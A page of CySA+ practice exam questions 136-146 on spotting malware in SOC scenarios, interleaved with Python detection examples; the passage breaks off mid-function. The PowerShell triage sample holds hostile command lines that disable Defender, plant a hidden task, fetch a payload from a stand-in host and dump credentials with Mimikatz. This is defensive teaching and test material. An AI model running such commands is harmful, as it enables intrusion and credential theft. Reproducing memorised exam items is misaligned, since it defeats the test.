CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 10 Q136-150
Question 136
A SOC analyst identifies Linux endpoints repeatedly attempting to connect via Telnet to multiple unknown external IP addresses during off-hours. The traffic originates from undocumented scripts, and standard SSH connections are disabled on the endpoints. What is the most likely threat, and what should the SOC do first?
A) Routine network administration; allow traffic.
B) Malware establishing legacy remote access or tunneling; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured Telnet settings; update configuration.
D) User network testing; notify users.
Answer: B)
Explanation:
Option A assumes routine network administration. Legitimate administration uses approved and documented protocols, typically SSH for Linux systems, and follows scheduled, auditable procedures. Telnet is insecure and rarely used for routine administration in modern environments. Off-hours connections from undocumented scripts indicate anomalous activity. Allowing this activity could enable malware to establish remote access, exfiltrate sensitive data, or perform lateral movement. Routine administrative activity is predictable and uses verified tools, making anomalous Telnet connections suspicious.
Option B is correct. Malware sometimes leverages legacy protocols like Telnet to establish remote access and bypass security monitoring. Indicators include off-hours activity, connections to unknown external IPs, execution by undocumented scripts, and disabled standard SSH channels. Immediate SOC response involves isolating the affected endpoints to prevent further compromise, capturing network traffic for analysis, and examining scripts for persistence mechanisms, payloads, and potential command-and-control channels. Isolate at the network layer (EDR containment or a quarantine VLAN) rather than powering the host off, so the running process, its open sockets, and its memory remain available for capture. Correlating traffic with threat intelligence can help identify malicious infrastructure. Remediation includes cleaning endpoints, restoring SSH services with proper security configurations, blocking unauthorized Telnet traffic, and implementing monitoring for similar anomalies. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Ignoring this activity could allow malware to maintain covert access, compromise additional endpoints, and exfiltrate sensitive data.
Option C assumes misconfigured Telnet settings. Misconfigurations usually cause failed connections or connection errors rather than persistent off-hours access attempts from undocumented scripts. Treating this as benign allows malware to operate undetected and persist in the environment.
Option D assumes user network testing. Testing is scheduled, documented, and predictable. Execution of scripts connecting to unknown IPs during off-hours is inconsistent with testing activity. Misclassification risks persistent malware activity, lateral movement, and potential data exfiltration.
Selecting option B ensures rapid containment, forensic analysis, and remediation, maintaining endpoint integrity while preventing unauthorized access. Isolating endpoints and analyzing scripts provides insight into malware behavior, strengthens detection capabilities, and preserves evidence for regulatory and investigative purposes.
Question 137
A SOC analyst observes multiple Windows endpoints attempting repeated unauthorized PowerShell remote sessions to other internal systems during off-hours. These sessions originate from unsigned scripts that attempt credential harvesting. What is the most likely threat, and what is the SOC’s first response?
A) Routine PowerShell administration; allow execution.
B) Malware performing lateral movement and credential harvesting; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured PowerShell remoting; update configuration.
D) User testing of PowerShell remoting; notify users.
Answer: B)
Explanation:
Option A assumes routine PowerShell administration. Legitimate administration uses signed scripts, documented schedules, and authorized accounts. Off-hours execution of unsigned scripts attempting remote sessions to multiple internal systems indicates anomalous activity. Allowing this behavior risks malware performing lateral movement, harvesting credentials, and compromising additional systems undetected. Legitimate administrative activity is auditable and follows established protocols.
Option B is correct. Malware frequently leverages PowerShell remoting for lateral movement and credential theft. Indicators include off-hours execution, unsigned scripts, repeated remote sessions, and targeting multiple internal endpoints. Immediate SOC response involves isolating affected endpoints to prevent further lateral movement, capturing memory and script logs for forensic analysis, and analyzing scripts to identify malware behavior, persistence mechanisms, and stolen credentials. Memory must be captured before any reboot or shutdown, since credential material and in-memory script bodies are lost otherwise. Correlation with SIEM and threat intelligence can help identify additional compromised systems. Remediation includes cleaning endpoints, enforcing signed scripts, strengthening authentication policies, updating detection rules for anomalous PowerShell activity, and monitoring for similar activity. Preserving forensic evidence ensures regulatory compliance and supports post-incident investigation. Ignoring this activity allows malware to spread, escalate privileges, and exfiltrate sensitive data.
Option C assumes misconfigured PowerShell remoting. Misconfigurations typically produce predictable errors and limited impact, unlike off-hours repeated unauthorized remote session attempts. Treating this as benign allows malware to persist and compromise internal systems.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, unsigned scripts performing unauthorized sessions across multiple endpoints are inconsistent with legitimate testing. Misclassification risks persistent malware activity and credential compromise.
Selecting option B ensures containment, forensic analysis, and remediation while protecting internal systems, credentials, and sensitive information.
Question 138
A SOC analyst detects Linux endpoints generating repeated DNS queries for newly registered domains with high-entropy subdomains. The activity occurs outside business hours and is executed by undocumented scripts. What is the most likely threat, and what is the SOC’s first response?
A) Normal DNS resolution; allow queries.
B) Malware using dynamically generated domains for command-and-control or DNS tunneling; capture traffic, isolate endpoints, and analyze scripts.
C) Misconfigured DNS services; update configuration.
D) User testing of DNS services; verify activity with IT.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Standard DNS queries are predictable, target known domains, and originate from approved processes. Persistent off-hours queries to newly registered domains with high-entropy subdomains indicate anomalous behavior. Allowing this activity could enable malware to exfiltrate data, maintain covert command-and-control communication, or persist undetected. Legitimate DNS activity rarely generates long runs of high-entropy subdomains under a newly registered domain; where it does (CDN hostnames, some antivirus and reputation lookups), the domain is established and the querying process is known, so the queries should be judged on domain age, process, and timing together rather than on entropy alone.
Option B is correct. Malware often uses dynamically generated domains or DNS tunneling for command-and-control communication. Indicators include low-volume persistent queries, dynamically generated high-entropy subdomains, execution by undocumented scripts, and off-hours activity. Immediate SOC response involves capturing DNS traffic for analysis, isolating affected endpoints, and performing endpoint forensics to identify malware behavior and communication mechanisms. Correlating traffic with threat intelligence can help identify malicious domains and infrastructure. Remediation includes cleaning endpoints, updating detection rules for anomalous DNS patterns, and continuous monitoring. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Ignoring this activity could allow persistent malware presence, data exfiltration, and compromise of additional endpoints.
Option C assumes misconfigured DNS services. Misconfigurations typically result in errors or limited resolution failures and do not explain continuous high-entropy queries. Treating this as benign risks covert malware activity continuing undetected.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours high-entropy queries from undocumented scripts are inconsistent with legitimate testing and indicate malicious activity. Misclassification allows malware to persist undetected.
Selecting option B ensures containment, forensic analysis, and remediation while safeguarding network integrity and sensitive information.
Question 139
A SOC analyst observes Windows endpoints executing scripts that attempt to disable endpoint detection and response (EDR) software and connect to unknown external IPs during off-hours. The scripts run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass security controls and maintain persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured EDR policies; update configuration.
D) User testing of security software; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative scripts. Legitimate administration is scheduled, documented, and uses approved tools. Scripts that disable EDR, run with elevated privileges, and connect to unknown external IPs are clearly anomalous. Allowing this activity risks persistent malware presence, evasion of security controls, and data exfiltration.
Option B is correct. Malware often attempts to disable endpoint security to evade detection and establish persistence. Indicators include off-hours execution, elevated privileges, unknown scripts, and communication with external IPs. Immediate SOC response involves isolating affected endpoints, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and potential C2 channels. Remediation includes cleaning endpoints, restoring EDR functionality, updating detection rules, and monitoring for similar activity. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Ignoring this activity could allow malware to persist, exfiltrate sensitive data, and compromise additional systems.
Option C assumes misconfigured EDR policies. Misconfigurations typically do not result in elevated scripts disabling protection and connecting externally. Treating this as benign risks an undetected compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours execution of unauthorized scripts affecting security software is inconsistent with testing and indicates malicious behavior. Misclassification could result in persistent malware and continued compromise.
Selecting option B ensures containment, forensic analysis, and remediation while maintaining endpoint security and preventing further compromise.
Question 140
A SOC analyst observes endpoints attempting repeated unauthorized access to sensitive file shares during off-hours. The attempts are executed by unknown processes and affect multiple accounts across several systems. What is the most likely threat, and what is the SOC’s first response?
A) Routine backup or maintenance; allow access.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured file share permissions; update configuration.
D) Legitimate off-hours testing; notify users.
Answer: B)
Explanation:
Option A assumes routine backup or maintenance. Legitimate activity is scheduled, predictable, uses authorized accounts, and targets approved systems. Off-hours repeated unauthorized access by unknown processes indicates malicious behavior. Ignoring this could allow malware to map the network, perform lateral movement, or exfiltrate sensitive data. Routine maintenance does not cause multi-account unauthorized access attempts.
Option B is correct. Malware frequently probes file shares to perform reconnaissance, lateral movement, or exfiltration. Indicators include off-hours activity, repeated unauthorized access attempts, multi-account targeting, and execution by unknown processes. Immediate SOC response involves isolating affected endpoints, reviewing file access logs, and performing endpoint forensics to identify malicious processes. Correlating activity across SIEM data can reveal compromised accounts and systems. Remediation includes cleaning endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence ensures regulatory compliance, supports investigation, and informs threat detection strategies. Ignoring this activity could result in persistent malware access, unauthorized lateral movement, and data compromise.
Option C assumes misconfigured file share permissions. Misconfigurations produce predictable errors or isolated access issues, unlike multi-account off-hours access attempts. Treating this as benign risks continued compromise.
Option D assumes legitimate testing. Testing is scheduled, documented, and predictable. Unauthorized off-hours activity by unknown processes is inconsistent with testing and suggests malicious intent. Misclassification could allow malware to maintain persistent access and exfiltrate data.
Selecting option B ensures immediate containment, forensic analysis, and remediation while protecting file share integrity and preventing unauthorized lateral movement.
Question 141
A SOC analyst observes Linux endpoints executing scripts that attempt to download unsigned binaries from unknown external IPs during off-hours. The processes run with elevated privileges and bypass standard system controls. What is the most likely threat, and what is the SOC’s first response?
A) Routine software updates; allow downloads.
B) Malware attempting to establish persistence and evade detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured package management; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine software updates. Legitimate updates are signed, scheduled, documented, and come from approved repositories. Off-hours execution of unsigned binaries from unknown IPs is anomalous and could allow malware to persist, escalate privileges, and exfiltrate data. Ignoring this activity risks compromise of additional endpoints and potential lateral movement across the network. Routine updates generate logs and follow controlled processes, unlike the observed activity.
Option B is correct. Malware often downloads unsigned binaries to establish persistence, evade detection, or deploy additional payloads. Indicators include elevated privileges, off-hours activity, execution by undocumented scripts, and contact with unknown external IPs. Immediate SOC response involves isolating endpoints to prevent further compromise, capturing memory and system logs for forensic analysis, and analyzing scripts to determine malware behavior and persistence mechanisms. Network monitoring and threat intelligence correlation can help identify malicious infrastructure. Remediation includes cleaning endpoints, restoring security configurations, blocking malicious domains, updating detection rules, and monitoring for similar activity. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and enhances threat intelligence. Ignoring the activity allows malware to maintain persistent access, deploy additional payloads, and exfiltrate sensitive information undetected.
Option C assumes misconfigured package management. Misconfigurations may cause failed downloads or errors, but do not explain off-hours execution of unsigned binaries from unknown IPs. Treating this as benign would leave malware operational.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours download and execution of unsigned binaries from unknown IPs is inconsistent with legitimate testing, and misclassification could allow malware to persist and evade detection.
Selecting option B ensures immediate containment, forensic analysis, and remediation while protecting endpoints and sensitive data from persistent malware and potential exfiltration.
Question 142
A SOC analyst identifies multiple Windows endpoints executing obfuscated PowerShell scripts that create hidden scheduled tasks, disable security monitoring, and attempt to download remote payloads. The activity occurs during off-hours. What is the most likely threat, and what is the SOC’s first response?
A) Routine administrative scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured task scheduler; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative scripts. Legitimate administrative activity is scheduled, documented, signed, and predictable. Off-hours execution of obfuscated scripts that create hidden scheduled tasks and disable security monitoring indicates anomalous behavior. Allowing this activity could let malware persist, evade detection, and compromise additional systems. Legitimate scripts do not disable monitoring or download unknown payloads.
Option B is correct. Fileless malware often leverages PowerShell to execute entirely in memory, maintain persistence through hidden scheduled tasks, disable security tools, and download additional payloads. Indicators include off-hours execution, obfuscation, multi-endpoint involvement, and attempts to bypass security monitoring. Immediate SOC response involves isolating affected endpoints to prevent lateral movement, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware functionality and persistence mechanisms. Network traffic should be monitored for communications with external IPs, and threat intelligence can identify known malicious infrastructure. Remediation includes cleaning affected endpoints, restoring monitoring and task scheduling integrity, updating detection rules, and monitoring for similar activity. Preserving forensic evidence ensures regulatory compliance and supports post-incident investigation. Ignoring this activity allows malware to maintain access, evade detection, and deploy additional payloads undetected.
Option C assumes a misconfigured task scheduler. Misconfigurations typically generate errors or fail silently and do not explain obfuscated scripts, disabled monitoring, or payload downloads. Treating this as benign risks persistent malware activity.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours obfuscated scripts creating hidden tasks and downloading payloads are inconsistent with testing activity. Misclassification allows malware to maintain persistence and evade detection.
Selecting option B ensures rapid containment, forensic analysis, and remediation while protecting system integrity and preventing malware persistence.
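The three Windows scenarios above (Q137 unsigned remoting scripts, Q139 EDR tampering, Q142 obfuscated scripts with hidden tasks and downloads) all turn on the same triage step: read the script-block text the endpoint logged, decode any -EncodedCommand payload, and look for the behaviours the questions describe. The following is an added example written for this page, not code from the exam or any vendor; the indicator patterns, the 07:00-19:00 business window, the signed/unsigned flag and the sample events are all assumptions, and the staged payload's URL uses the reserved .invalid TLD.

```python
import base64
import re
from datetime import datetime

# Added example (not from the exam page): triage of PowerShell script-block log
# entries such as Windows Event ID 4104 "ScriptBlockText". The patterns and
# thresholds below are illustrative assumptions to be tuned per environment.
INDICATORS = {
    "disables_security_tooling": re.compile(
        r"Set-MpPreference\s+-Disable\w+|Stop-Service\s+\S*(sense|defend)", re.I),
    "creates_scheduled_task": re.compile(
        r"schtasks(\.exe)?\s+/create|Register-ScheduledTask|New-ScheduledTask", re.I),
    "remote_session": re.compile(
        r"Invoke-Command\s+-ComputerName|New-PSSession|Enter-PSSession", re.I),
    "downloads_payload": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I),
    "credential_access": re.compile(
        r"Invoke-Mimikatz|sekurlsa|\blsass\b|MiniDump", re.I),
}

# -EncodedCommand (PowerShell also accepts the short forms) carries a Base64
# string of the UTF-16LE script body, which is why grep on the raw line misses it.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand body, or None if absent or undecodable."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_off_hours(ts, start_hour=7, end_hour=19):
    """Assumed business window: 07:00-19:00, Monday to Friday."""
    return ts.weekday() >= 5 or not (start_hour <= ts.hour < end_hour)


def triage_script_block(event):
    """Score one script-block event; returns the indicators hit and a recommended verdict."""
    body = event["script"]
    indicators = []
    decoded = decode_encoded_command(body)
    if decoded is not None:
        indicators.append("encoded_command")
        body = body + "\n" + decoded            # inspect the decoded body as well
    for name, pattern in INDICATORS.items():
        if pattern.search(body):
            indicators.append(name)
    off_hours = is_off_hours(event["time"])
    unsigned = not event.get("signed", False)
    # Context raises priority: unsigned + off-hours + any behavioural indicator
    # is exactly the pattern the questions describe.
    score = len(indicators) + int(off_hours) + int(unsigned)
    if indicators and score >= 3:
        verdict = "isolate_and_collect"       # network-contain, capture memory, pull the script
    elif score:
        verdict = "review"
    else:
        verdict = "benign"
    return {"host": event["host"], "user": event["user"], "time": event["time"].isoformat(),
            "off_hours": off_hours, "signed": not unsigned, "indicators": indicators,
            "decoded": decoded, "score": score, "verdict": verdict}


# Constructed sample events (not real telemetry).
_STAGED_PAYLOAD = (
    "Set-MpPreference -DisableRealtimeMonitoring $true; "
    "schtasks /create /tn Updater /sc minute /mo 15 /tr 'powershell -w hidden -nop'; "
    "(New-Object Net.WebClient).DownloadString('https://updates.invalid/stage2')"
)
_ENCODED = base64.b64encode(_STAGED_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"time": datetime(2024, 5, 14, 10, 5), "host": "WS-0142", "user": "CORP\\jdoe",
     "signed": True, "script": "Get-Service -Name Spooler | Restart-Service"},
    {"time": datetime(2024, 5, 15, 2, 13), "host": "WS-0142", "user": "NT AUTHORITY\\SYSTEM",
     "signed": False, "script": f"powershell.exe -NoP -W Hidden -EncodedCommand {_ENCODED}"},
    {"time": datetime(2024, 5, 15, 2, 20), "host": "WS-0142", "user": "NT AUTHORITY\\SYSTEM",
     "signed": False,
     "script": "Invoke-Command -ComputerName FS01,FS02 -ScriptBlock { Invoke-Mimikatz -DumpCreds }"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = triage_script_block(ev)
        print(result["time"], result["verdict"], result["indicators"])
```

The decode step is the part most often skipped: the second sample contains none of the indicator strings on the logged command line, and only becomes obviously hostile once the UTF-16LE body is recovered. Script Block Logging (Event ID 4104) must be enabled for this text to exist at all, which is itself a control worth verifying during the review.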
Question 143
A SOC analyst observes Linux endpoints performing low-volume, continuous HTTPS requests to newly registered domains with dynamically generated subdomains. The activity occurs outside business hours and originates from undocumented scripts. What is the most likely threat, and what should the SOC do first?
A) Routine telemetry; allow connections.
B) Malware using dynamically generated domains for command-and-control; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured web services; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes routine telemetry. Normal telemetry targets known servers, follows predictable schedules, and originates from approved processes. Low-volume, continuous off-hours requests to newly registered high-entropy subdomains indicate anomalous behavior. Allowing this could enable malware to maintain command-and-control channels, exfiltrate data, and persist undetected. Telemetry does not use dynamically generated subdomains or hold continuous off-hours connections.
Option B is correct. Malware commonly uses dynamically generated domains to maintain covert command-and-control communication. Indicators include low-volume continuous traffic, dynamically generated subdomains, off-hours activity, and execution by undocumented scripts. Immediate SOC response involves isolating affected endpoints, capturing network traffic for analysis, and performing endpoint forensics to identify malicious scripts and C2 infrastructure. Threat intelligence can help identify known malicious domains. Remediation includes cleaning endpoints, updating detection rules for anomalous DNS or HTTPS traffic, and monitoring for similar activity across the network. Preserving forensic evidence ensures regulatory compliance, supports post-incident investigation, and enhances threat intelligence. Ignoring this activity allows malware to maintain covert access, exfiltrate data, and compromise additional systems.
Option C assumes misconfigured web services. Misconfigurations produce predictable errors or isolated failures and do not account for off-hours, continuous low-volume traffic to dynamically generated domains. Treating this as benign risks covert malware operations continuing undetected.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours execution of undocumented scripts with continuous connections is inconsistent with legitimate testing. Misclassification allows malware to persist and evade detection.
Selecting option B ensures containment, forensic analysis, and remediation while protecting sensitive data and network integrity.
Question 144
A SOC analyst detects Windows endpoints attempting multiple failed logins to sensitive database accounts during off-hours. Unknown processes execute these attempts across multiple accounts. What is the most likely threat, and what is the SOC’s first response?
A) Routine database maintenance; allow activity.
B) Malware or malicious insider attempting unauthorized access or credential harvesting; isolate endpoints, review logs, and analyze processes.
C) Misconfigured authentication policies; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine database maintenance. Legitimate maintenance is scheduled, predictable, and uses authorized accounts. Repeated failed login attempts across multiple accounts by unknown processes indicate malicious activity. Ignoring this could result in unauthorized access, credential theft, and compromise of sensitive information. Routine maintenance does not trigger multi-account off-hours failed login attempts.
Option B is correct. Malware or a malicious insider may attempt unauthorized access to sensitive accounts for exfiltration or lateral movement. Indicators include off-hours activity, repeated login failures across multiple accounts, and execution by unknown processes. Immediate SOC response involves isolating affected endpoints to prevent further unauthorized access, reviewing authentication logs to identify impacted accounts, and performing endpoint forensics to determine responsible processes or malware. Remediation includes cleaning endpoints, revoking unauthorized access, strengthening authentication policies, updating monitoring rules, and validating account integrity. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Failing to respond risks compromise of sensitive financial or operational data and potential regulatory penalties.
Option C assumes misconfigured authentication policies. Misconfigurations produce predictable errors and typically affect limited accounts. Treating this as benign risks persistent unauthorized access.
Option D assumes legitimate testing. Testing is scheduled, documented, and predictable. Off-hours repeated failed logins across multiple accounts by unknown processes are inconsistent with testing activity. Misclassification allows unauthorized access attempts to persist.
Selecting option B ensures immediate containment, forensic analysis, and remediation, protecting database integrity and preventing credential compromise.
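Q140 (unknown processes hitting sensitive shares across many accounts) and Q144 (failed logins against many database accounts) describe the same detection problem: one source touching many accounts or resources in a short window, which is a password spray or reconnaissance pattern rather than a mistyped password. The following is an added example written for this page, not code from the exam or any product; the event shape (the fields of Windows 4625 and 5145 plus the originating process an EDR would add), the ten-minute window, the thresholds, the business hours and the trusted process prefixes are all assumptions, and the events are constructed.

```python
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Added example (not from the exam page): detect one source trying many accounts
# (spray) or one account many times (brute force) against databases and file
# shares, from a constructed feed of failed-authentication / access-denied events.
# Window, thresholds, hours and the trusted process list are assumptions.
WINDOW = timedelta(minutes=10)
SPRAY_MIN_ACCOUNTS = 5
BRUTE_MIN_ATTEMPTS = 10
BUSINESS_HOURS = (7, 19)
TRUSTED_PROCESS_PREFIXES = ("C:\\Program Files\\", "C:\\Windows\\System32\\")


def is_off_hours(ts):
    return ts.weekday() >= 5 or not (BUSINESS_HOURS[0] <= ts.hour < BUSINESS_HOURS[1])


def detect_auth_anomalies(events):
    """Slide WINDOW over failed events per source host; emit one alert per (source, pattern)."""
    alerts = {}
    recent = defaultdict(deque)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["outcome"] != "failure":
            continue
        q = recent[ev["source_host"]]
        q.append(ev)
        while ev["ts"] - q[0]["ts"] > WINDOW:      # drop events older than the window
            q.popleft()
        per_account = Counter(e["target_account"] for e in q)
        top_account, top_count = per_account.most_common(1)[0]
        if len(per_account) >= SPRAY_MIN_ACCOUNTS:
            kind = "password_spray"                 # many accounts, few tries each
        elif top_count >= BRUTE_MIN_ATTEMPTS:
            kind = "brute_force"                    # one account, many tries
        else:
            continue
        a = alerts.setdefault((ev["source_host"], kind), {
            "source_host": ev["source_host"], "kind": kind, "first_seen": q[0]["ts"],
            "accounts": set(), "resources": set(), "processes": set(), "window_peak": 0,
        })
        a["last_seen"] = ev["ts"]
        a["accounts"].update(per_account)
        a["resources"].update(e["resource"] for e in q)
        a["processes"].update(e["process"] for e in q)
        a["window_peak"] = max(a["window_peak"], len(q))
    out = []
    for a in alerts.values():
        untrusted = sorted(p for p in a["processes"] if not p.startswith(TRUSTED_PROCESS_PREFIXES))
        off = is_off_hours(a["first_seen"])
        a.update({
            "accounts": sorted(a["accounts"]), "resources": sorted(a["resources"]),
            "processes": sorted(a["processes"]), "distinct_accounts": len(a["accounts"]),
            "off_hours": off, "untrusted_processes": untrusted,
            "verdict": "isolate_and_investigate" if (off or untrusted) else "review",
            "action": "contain the source host, pull its process tree and memory, then review "
                      "and lock the targeted accounts; treat any later success from it as a breach",
        })
        out.append(a)
    return sorted(out, key=lambda a: a["first_seen"])


def _ev(ts, source, process, account, resource, outcome="failure", event_id=4625):
    return {"ts": ts, "event_id": event_id, "source_host": source, "process": process,
            "target_account": account, "resource": resource, "outcome": outcome}


# Constructed sample (not real telemetry).
_T = datetime(2024, 5, 15, 2, 4)
SAMPLE_EVENTS = [
    # Off-hours, unknown binary, six different DB accounts within three minutes: spray.
    _ev(_T + timedelta(seconds=30 * i), "WS-0233", "C:\\Users\\Public\\svc.exe", acct, "SQLPROD01")
    for i, acct in enumerate(["sa", "dbadmin", "backup_svc", "report_ro", "etl_user", "finance_app"])
] + [
    # Same source then probing two sensitive shares (5145-style access denied).
    _ev(_T + timedelta(minutes=5), "WS-0233", "C:\\Users\\Public\\svc.exe", "etl_user",
        "\\\\FS01\\Finance", event_id=5145),
    _ev(_T + timedelta(minutes=6), "WS-0233", "C:\\Users\\Public\\svc.exe", "etl_user",
        "\\\\FS01\\HR", event_id=5145),
    # Business-hours backup agent that failed twice, then succeeded: no alert.
    _ev(datetime(2024, 5, 15, 9, 12), "WS-0104", "C:\\Program Files\\Backup\\agent.exe",
        "backup_svc", "SQLPROD01"),
    _ev(datetime(2024, 5, 15, 9, 13), "WS-0104", "C:\\Program Files\\Backup\\agent.exe",
        "backup_svc", "SQLPROD01"),
    _ev(datetime(2024, 5, 15, 9, 14), "WS-0104", "C:\\Program Files\\Backup\\agent.exe",
        "backup_svc", "SQLPROD01", outcome="success"),
]

if __name__ == "__main__":
    for alert in detect_auth_anomalies(SAMPLE_EVENTS):
        print(alert["source_host"], alert["kind"], alert["distinct_accounts"], alert["verdict"])
```

Keying the alert on the source host rather than the target account is what separates a spray from ordinary lockout noise: per-account thresholds never fire when each account sees one or two attempts. The share probes from the same host fold into the same alert, which is the Q140 picture of reconnaissance following credential guessing.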
Question 145
A SOC analyst observes endpoints creating new administrative accounts and modifying group policies during off-hours. Unsigned scripts execute these changes without authorization. What is the most likely threat, and what is the SOC’s first response?
A) Routine administrative changes; allow activity.
B) Malware attempting privilege escalation and persistent access; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured Active Directory policies; update configuration.
D) User security testing; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative changes. Legitimate changes are scheduled, documented, logged, and performed by authorized personnel. Unsigned scripts creating new administrative accounts and modifying group policies during off-hours are anomalous. Allowing this activity could enable malware to escalate privileges, maintain persistence, and compromise additional systems. Routine administrative changes are predictable and auditable, unlike unauthorized scripts.
Option B is correct. Malware often creates accounts and modifies group policies to gain persistent access and evade detection. Indicators include off-hours execution, elevated privileges, unsigned scripts, and undocumented changes in Active Directory. Immediate SOC response involves isolating endpoints to prevent further compromise, capturing memory and directory logs for forensic analysis, and analyzing scripts to understand malware behavior and persistence mechanisms. Correlating activity with SIEM data can identify impacted accounts and systems. Remediation includes removing unauthorized accounts, restoring group policies, cleaning endpoints, and updating monitoring rules. Preserving forensic evidence ensures regulatory compliance, supports post-incident investigation, and informs threat detection strategies. Ignoring this activity allows malware to establish long-term control, exfiltrate sensitive data, and pivot across the network.
Option C assumes misconfigured Active Directory policies. Misconfigurations typically produce limited errors or access issues and do not explain off-hours unauthorized account creation and policy changes. Treating this as benign risks persistent malware activity.
Option D assumes user security testing. Testing is scheduled, documented, and predictable. Unsigned scripts modifying accounts and policies during off-hours are inconsistent with testing activity. Misclassification allows malware to persist and evade detection.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining directory integrity.
Question 146
A SOC analyst detects multiple Windows endpoints initiating outbound RDP connections to unknown external IPs during off-hours. Unsigned scripts execute these connections and attempt privilege escalation. What is the most likely threat, and what is the SOC’s first response?
A) Routine remote administration; allow connections.
B) Malware establishing remote access and lateral movement; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured RDP settings; update configuration.
D) User security testing; notify users.
Answer: B)
Explanation:
Option A assumes routine remote administration. Legitimate administration uses known IPs, follows schedules, and employs documented tools. Off-hours, unsigned scripts attempting RDP connections to unknown external IPs with privilege escalation attempts are anomalous. Allowing this behavior could enable malware to establish remote access, compromise credentials, and perform lateral movement across the network. Legitimate administration is auditable, predictable, and uses signed tools.
Option B is correct. Malware frequently uses RDP to establish remote access and enable lateral movement. Indicators include off-hours activity, connections to unknown external IPs, execution by unsigned scripts, and privilege escalation attempts. Immediate SOC response involves isolating endpoints to prevent lateral movement, capturing memory for forensic analysis, and analyzing scripts to determine malware behavior and persistence. Network traffic should be monitored, and threat intelligence can help identify malicious IPs. Remediation includes cleaning endpoints, restoring security configurations, updating firewall and monitoring rules, and scanning the network for additional compromises. Preserving forensic evidence ensures regulatory compliance and supports incident investigation. Ignoring this activity allows malware to persist, escalate privileges, and exfiltrate sensitive data.
Option C assumes misconfigured RDP settings. Misconfigurations cause limited connectivity issues and do not explain off-hours script execution targeting unknown IPs. Treating this as benign risks malware persistence.
Option D assumes user security testing. Testing is scheduled, documented, and predictable. Off-hours, unsigned scripts attempting RDP connections and privilege escalation are inconsistent with legitimate testing. Misclassification risks persistent malware activity.
Selecting option B ensures containment, forensic analysis, and remediation while protecting endpoints and credentials.
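Q136 (Linux hosts using Telnet to several unknown external IPs off-hours) and Q146 (Windows hosts opening outbound RDP to unknown external IPs off-hours) are the same network-level signal on two ports: a legacy remote-access protocol leaving the perimeter, from one source, to more than one unfamiliar destination, outside business hours. The following is an added example written for this page, not code from the exam or from Zeek; it reads Zeek-style conn.log records, but the RFC 1918 internal ranges, the sanctioned vendor console range (192.0.2.0/24), the 07:00-19:00 UTC window, the port list and the sample records are all assumptions, with RFC 5737 documentation addresses standing in for "unknown external IPs".

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timezone

# Added example (not from the exam page): flag off-hours outbound Telnet/RDP from
# internal hosts to multiple external destinations in Zeek conn.log records.
# Port list, hours and sanctioned ranges are assumptions.
LEGACY_REMOTE_PORTS = {23: "telnet", 3389: "rdp"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SANCTIONED_NETS = [ipaddress.ip_network("192.0.2.0/24")]   # assumed: vendor OOB console network
BUSINESS_HOURS = (7, 19)                                  # assumed, in the log's timezone (UTC)


def parse_zeek_conn(text):
    """Yield one dict per record of a Zeek TSV conn.log, named by its #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split("\t")))


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not addr.is_loopback and not any(addr in net for net in INTERNAL_NETS)


def is_sanctioned(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SANCTIONED_NETS)


def is_off_hours(ts):
    return ts.weekday() >= 5 or not (BUSINESS_HOURS[0] <= ts.hour < BUSINESS_HOURS[1])


def find_legacy_remote_access(conn_log, min_destinations=2):
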